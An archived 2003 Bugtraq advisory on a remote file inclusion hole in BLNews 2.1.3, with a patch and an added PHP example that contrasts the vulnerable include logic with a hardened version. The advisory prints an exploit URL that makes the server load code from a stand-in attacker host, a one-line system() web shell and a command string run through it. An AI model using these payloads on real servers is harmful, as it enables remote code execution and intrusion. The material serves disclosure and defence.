Bugtraq mailing list archives
PHP source code injection in BLNews
From: Over_G <overg () mail ru>
Date: Thu, 22 May 2003 14:42:13 +0400
Product: BLNews
Version: 2.1.3
OffSite: http://www.blnews.de/
Problem: PHP source code injection (remote file inclusion)

--------------------------------------------

Vulnerability:

------------admin/objects.inc.php4------------
if ($itheme!="blubb") {
    include("$Server[path]/admin/tools.inc.php4");
}
include("$Server[path]/admin/$Server[language_file]");
-----------------------------------------------------

The developers forgot to write include("server.inc.php4") :)

Because the configuration file is never included, $Server is not initialised before it is used. With register_globals on (the PHP 4 default), both Server[path] and Server[language_file] can therefore be supplied straight from the query string, and a value such as http://ATACKER makes PHP fetch and execute the included files from the attacker's web server.

Exploit:

admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4

with

http://ATACKER/admin/tools.inc.php4
http://ATACKER/admin/cmd.php4

with

<? system($cmd) ?>

Use:

objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd;

Patch:

Write before the line

if ($itheme!="blubb")

the include

include("server.inc.php4");

Contacts:

www.overg.com
www.dwcgr0up.com
irc.irochka.net #DWC
overg () mail ru

regards,
Over G [DWC Gr0up]
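The following is an added example, not code from the advisory or from BLNews. It reproduces the register_globals mapping the exploit relies on with parse_str(), shows the include targets the vulnerable lines above would compute for the advisory's query string, and puts a hardened resolver beside them. It assumes that server.inc.php4 defines $Server['path'] and $Server['language_file'] (inferred from the vulnerable include lines); the language file names in the allow-list are invented for the demo.

```php
<?php
// Added example; not code from the advisory or from BLNews.
// Assumptions: server.inc.php4 defines $Server['path'] and
// $Server['language_file'] (inferred from the vulnerable include lines);
// the language file names in $allowed below are invented for the demo.

// With register_globals=On (the PHP 4 default this advisory relies on),
// every query-string parameter becomes a global variable. parse_str()
// reproduces that mapping, including the Server[path]=... array syntax
// the exploit uses, so $vars['Server'] below is exactly the $Server the
// vulnerable script sees when server.inc.php4 is never included.
function globals_from_query($query)
{
    $vars = array();
    parse_str($query, $vars);
    return $vars;
}

// Vulnerable pattern: the include targets admin/objects.inc.php4 would
// compute when $Server comes from the request and $itheme is unset
// (unset != "blubb", so tools.inc.php4 is included too).
function vulnerable_include_targets(array $Server, $itheme = null)
{
    $targets = array();
    if ($itheme != "blubb") {
        $targets[] = "$Server[path]/admin/tools.inc.php4";
    }
    $targets[] = "$Server[path]/admin/$Server[language_file]";
    return $targets;
}

// Hardened pattern. In the real script this follows the advisory's patch:
//     $Server = array();            // discard any request-supplied array
//     include("server.inc.php4");   // trusted config defines $Server
// and then, as defence in depth, never builds an include path from a
// value that could be tainted: the directory is pinned to this file's
// location and the language file is reduced to a bare name that must be
// on an allow-list of files shipped with the product.
function hardened_include_targets(array $Server, $itheme = null)
{
    $allowed = array('de.lang.php4', 'en.lang.php4');   // assumed file names
    $base = dirname(__FILE__);                          // never request-controlled
    $lang = basename((string) $Server['language_file']); // strips dirs and URL schemes
    if (!in_array($lang, $allowed, true)) {
        $lang = $allowed[0];                            // or fail closed with an error
    }
    $targets = array();
    if ($itheme != "blubb") {
        $targets[] = "$base/tools.inc.php4";
    }
    $targets[] = "$base/$lang";
    return $targets;
}

// Demo 1: the advisory's exploit query string (constructed input).
$req = globals_from_query(
    'Server[path]=http://ATACKER&Server[language_file]=cmd.php4&cmd=id'
);
print_r(vulnerable_include_targets($req['Server']));
// http://ATACKER/admin/tools.inc.php4 and http://ATACKER/admin/cmd.php4:
// both are fetched over HTTP and executed as PHP when allow_url_fopen is on,
// and $cmd (also a register_globals variable) reaches system().

// Demo 2: even a hostile $Server array never produces a target outside
// the install directory with the hardened resolver.
$hostile = array('path' => 'http://ATACKER', 'language_file' => '../../cmd.php4');
print_r(hardened_include_targets($hostile));
```

The advisory's one-line patch closes the hole only if server.inc.php4 assigns every key of $Server that objects.inc.php4 later reads; any key it leaves unset still comes from the request under register_globals, which is why the hardened version also validates language_file against a fixed list. Turning off register_globals and allow_url_fopen (and, from PHP 5.2 on, allow_url_include) in php.ini removes the remote-code path at the runtime level regardless of the application code.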